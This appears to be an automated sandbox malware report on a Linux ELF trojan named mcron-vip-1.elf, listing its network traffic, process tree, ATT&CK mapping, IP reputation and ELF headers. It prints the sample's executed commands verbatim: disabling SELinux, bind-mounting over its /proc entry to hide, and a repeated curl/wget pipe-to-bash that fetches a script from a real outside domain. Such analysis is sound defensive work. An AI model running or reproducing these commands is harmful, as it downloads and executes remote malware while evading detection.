Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:09:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:10:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:10:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:11:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:11:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:12:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:12:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:13:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:13:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443
Source: mcron-vip-1.elfELF static info symbol of initial sample: _Z11hideProcessi
Source: mcron-vip-1.elfELF static info symbol of initial sample: _Z14executeCommandPKc
Source: classification engineClassification label: mal52.evad.linELF@0/1@22/0
Source: /tmp/mcron-vip-1.elf (PID: 5489)File: /var/tmp/.cronJump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5489)Directory: /tmp/.cJump to behavior
Source: /usr/bin/curl (PID: 5518)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5585)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5619)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5659)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5694)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5728)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5761)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5794)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/curl (PID: 5827)Directory: /root/.curlrcJump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5490)Shell command executed: sh -c "setenforce 0 &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5492)Shell command executed: sh -c "mount --bind /tmp/.c /proc/5489"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5504)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5582)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5616)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5656)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5691)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5725)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5758)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5791)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5824)Shell command executed: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"Jump to behavior
Source: /bin/sh (PID: 5518)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5585)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5619)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5659)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5694)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5728)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5761)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5794)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5827)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5516)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5583)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5617)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5657)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5692)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5726)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5759)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5792)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5825)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: ELF symbol in initial sampleSymbol name: sleep
Source: /tmp/mcron-vip-1.elf (PID: 5489)Sleeps longer then 60s: 60.0sJump to behavior
Source: /tmp/mcron-vip-1.elf (PID: 5489)Sleeps longer then 60s: 60.0sJump to behavior
Source: /usr/bin/curl (PID: 5518)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5516)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5517)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5585)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5583)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5584)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5619)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5617)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5618)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5659)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5657)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5658)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5694)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5692)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5693)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5728)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5726)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5727)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5761)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5759)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5760)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5794)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5792)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5793)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 5827)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/wget (PID: 5825)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 5826)Queries kernel information via 'uname': Jump to behavior

Anti Debugging

barindex
Source: /tmp/mcron-vip-1.elf (PID: 5492)Process with PPID: /bin/sh -> sh -c "mount --bind /tmp/.c /proc/5489"Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation2
Scripting
Path Interception11
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
1
Exfiltration Over Alternative Protocol
Abuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
Virtualization/Sandbox Evasion
LSASS Memory2
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Hidden Files and Directories
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1547393 Sample: mcron-vip-1.elf Startdate: 02/11/2024 Architecture: LINUX Score: 52 64 dl.0889.org 20.56.16.3, 51120, 51122, 51124 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 2->64 66 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->66 68 daisy.ubuntu.com 2->68 70 Multi AV Scanner detection for submitted file 2->70 11 mcron-vip-1.elf 2->11         started        13 udisksd dumpe2fs 2->13         started        signatures3 process4 process5 15 mcron-vip-1.elf 11->15         started        process6 17 mcron-vip-1.elf 15->17         started        process7 19 mcron-vip-1.elf sh 17->19         started        22 mcron-vip-1.elf sh 17->22         started        24 mcron-vip-1.elf sh 17->24         started        26 8 other processes 17->26 signatures8 72 Executes itself again with its parent PID as an argument (indicative of hampering debugging) 19->72 28 sh mount 19->28         started        30 sh wget 22->30         started        32 sh bash 22->32         started        34 sh wget 24->34         started        36 sh bash 24->36         started        38 sh wget 26->38         started        40 sh wget 26->40         started        42 sh wget 26->42         started        44 12 other processes 26->44 process9 process10 46 sh curl 30->46         started        48 sh curl 34->48         started        50 sh curl 38->50         started        52 sh curl 40->52         started        54 sh curl 42->54         started        56 sh curl 44->56         started        58 sh curl 44->58         started        60 sh curl 44->60         started        62 sh curl 44->62         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
mcron-vip-1.elf34%ReversingLabsLinux.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    unknown
    dl.0889.org
    20.56.16.3
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://dl.0889.org/vip-1.shfalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        20.56.16.3
        dl.0889.orgUnited States
        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        185.125.190.26
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        185.125.190.26i.elfGet hashmaliciousUnknownBrowse
          boatnet.arc.elfGet hashmaliciousMiraiBrowse
            boatnet.arm5.elfGet hashmaliciousMiraiBrowse
              nuklear.mips.elfGet hashmaliciousMiraiBrowse
                nuklear.mpsl.elfGet hashmaliciousMiraiBrowse
                  mipsel.elfGet hashmaliciousMirai, MoobotBrowse
                    xi.arm5.elfGet hashmaliciousUnknownBrowse
                      YXRAItYUZb.elfGet hashmaliciousDiskHelpYouBrowse
                        i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                          H5LPetzgXV.elfGet hashmaliciousUnknownBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            daisy.ubuntu.comi.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            boatnet.ppc.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.25
                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            armv5l.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.25
                            m68k.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.25
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                            • 52.168.117.173
                            spc.elfGet hashmaliciousMiraiBrowse
                            • 21.244.4.50
                            m68k.elfGet hashmaliciousUnknownBrowse
                            • 20.127.23.199
                            mpsl.elfGet hashmaliciousMiraiBrowse
                            • 52.245.21.241
                            arm6.elfGet hashmaliciousUnknownBrowse
                            • 21.9.102.78
                            ppc.elfGet hashmaliciousMiraiBrowse
                            • 52.121.72.154
                            sh4.elfGet hashmaliciousMiraiBrowse
                            • 21.244.4.80
                            x86_32.elfGet hashmaliciousGafgytBrowse
                            • 13.64.92.64
                            debug.dbg.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 40.122.77.40
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 51.105.71.136
                            CANONICAL-ASGB10000.elfGet hashmaliciousBillGatesBrowse
                            • 91.189.91.42
                            i.elfGet hashmaliciousUnknownBrowse
                            • 185.125.190.26
                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                            • 91.189.91.42
                            boatnet.arc.elfGet hashmaliciousMiraiBrowse
                            • 185.125.190.26
                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                            • 91.189.91.42
                            boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                            • 91.189.91.42
                            boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                            • 185.125.190.26
                            .i.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            sshd.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            armv7l.elfGet hashmaliciousMiraiBrowse
                            • 91.189.91.42
                            No context
                            No context
                            Process:/tmp/mcron-vip-1.elf
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):2.0
                            Encrypted:false
                            SSDEEP:3:Een:Ee
                            MD5:D902C3CE47124C66CE615D5AD9BA304F
                            SHA1:D49784030FF04923C480AC7A800B03FEDD67D329
                            SHA-256:C363831CBFEE684FA8A7D96B58CF42F5174EA935BC3B751FFF18C237D34D0366
                            SHA-512:9FD43824ED57DB5FDCB286C5DF1C540858CA87ACD203FB7217725A7E8CBC0A9E4FAF70A48DAD7A0B4667924810F2CC395501208960DDB60F9BBBEC016FE9BB39
                            Malicious:false
                            Reputation:low
                            Preview:5489
                            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=ff5ce0b545d2268f129d29f18aa5167a376a6925, not stripped
                            Entropy (8bit):4.271964786810613
                            TrID:
                            • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                            • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                            • Lumena CEL bitmap (63/63) 0.78%
                            File name:mcron-vip-1.elf
                            File size:13'016 bytes
                            MD5:4e9526bcce8ad234b516a6cf30a4acc9
                            SHA1:da42a05843d9662a2ee992d52d2c00fd048ae723
                            SHA256:de490d56cb9a511e4510160281fce2e3a6d9a3596ad7873b9dd7cfd61e52ae3d
                            SHA512:645297ffbb3f5aa852958c251aa5cc4c76e194e3415c06591bee9e3656cf83951b4e7e533ce5703ae069e76f6022cf4e92f26e2fe6f8d8e8a1369b53537eb47d
                            SSDEEP:192:GIGhy/P/mud89u0ciEcAwroU9FCPP+Sz4SX6zyBC45nMtze1i:OhQ/mudD00cprNFCPP+Kl6uBCtk1i
                            TLSH:F642730BF682CE7BC8D946341CAF8534A9B394F4DF22531B651461BA79923C80E2FAD5
                            File Content Preview:.ELF..............>.......@.....@...................@.8...@.............@.......@.@.....@.@...............................................@.......@...............................................@.......@....................... .......................`....

                            ELF header

                            Class:ELF64
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:Advanced Micro Devices X86-64
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - System V
                            ABI Version:0
                            Entry Point Address:0x400d10
                            Flags:0x0
                            ELF Header Size:64
                            Program Header Offset:64
                            Program Header Size:56
                            Number of Program Headers:8
                            Section Header Offset:7184
                            Section Header Size:64
                            Number of Section Headers:30
                            Header String Table Index:27
                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .interpPROGBITS0x4002000x2000x1c0x00x2A001
                            .note.ABI-tagNOTE0x40021c0x21c0x200x00x2A004
                            .note.gnu.build-idNOTE0x40023c0x23c0x240x00x2A004
                            .gnu.hashGNU_HASH0x4002600x2600x380x00x2A508
                            .dynsymDYNSYM0x4002980x2980x3180x180x2A618
                            .dynstrSTRTAB0x4005b00x5b00x1fd0x00x2A001
                            .gnu.versionVERSYM0x4007ae0x7ae0x420x20x2A502
                            .gnu.version_rVERNEED0x4007f00x7f00x500x00x2A628
                            .rela.dynRELA0x4008400x8400x480x180x2A508
                            .rela.pltRELA0x4008880x8880x2a00x180x2A5128
                            .initPROGBITS0x400b280xb280x180x00x6AX004
                            .pltPROGBITS0x400b400xb400x1d00x100x6AX004
                            .textPROGBITS0x400d100xd100x6c80x00x6AX0016
                            .finiPROGBITS0x4013d80x13d80xe0x00x6AX004
                            .rodataPROGBITS0x4013e80x13e80x1f70x00x2A008
                            .eh_frame_hdrPROGBITS0x4015e00x15e00x5c0x00x2A004
                            .eh_framePROGBITS0x4016400x16400x18c0x00x2A008
                            .ctorsPROGBITS0x6017d00x17d00x180x00x3WA008
                            .dtorsPROGBITS0x6017e80x17e80x100x00x3WA008
                            .jcrPROGBITS0x6017f80x17f80x80x00x3WA008
                            .dynamicDYNAMIC0x6018000x18000x1c00x100x3WA608
                            .gotPROGBITS0x6019c00x19c00x80x80x3WA008
                            .got.pltPROGBITS0x6019c80x19c80xf80x80x3WA008
                            .dataPROGBITS0x601ac00x1ac00x200x00x3WA008
                            .bssNOBITS0x601ae00x1ae00x2480x00x3WA0032
                            .commentPROGBITS0x00x1ae00x2d0x10x30MS001
                            .shstrtabSTRTAB0x00x1b0d0xfe0x00x0001
                            .symtabSYMTAB0x00x23900x9a80x180x029498
                            .strtabSTRTAB0x00x2d380x5a00x00x0001
                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            PHDR0x400x4000400x4000400x1c00x1c01.65980x5R E0x8
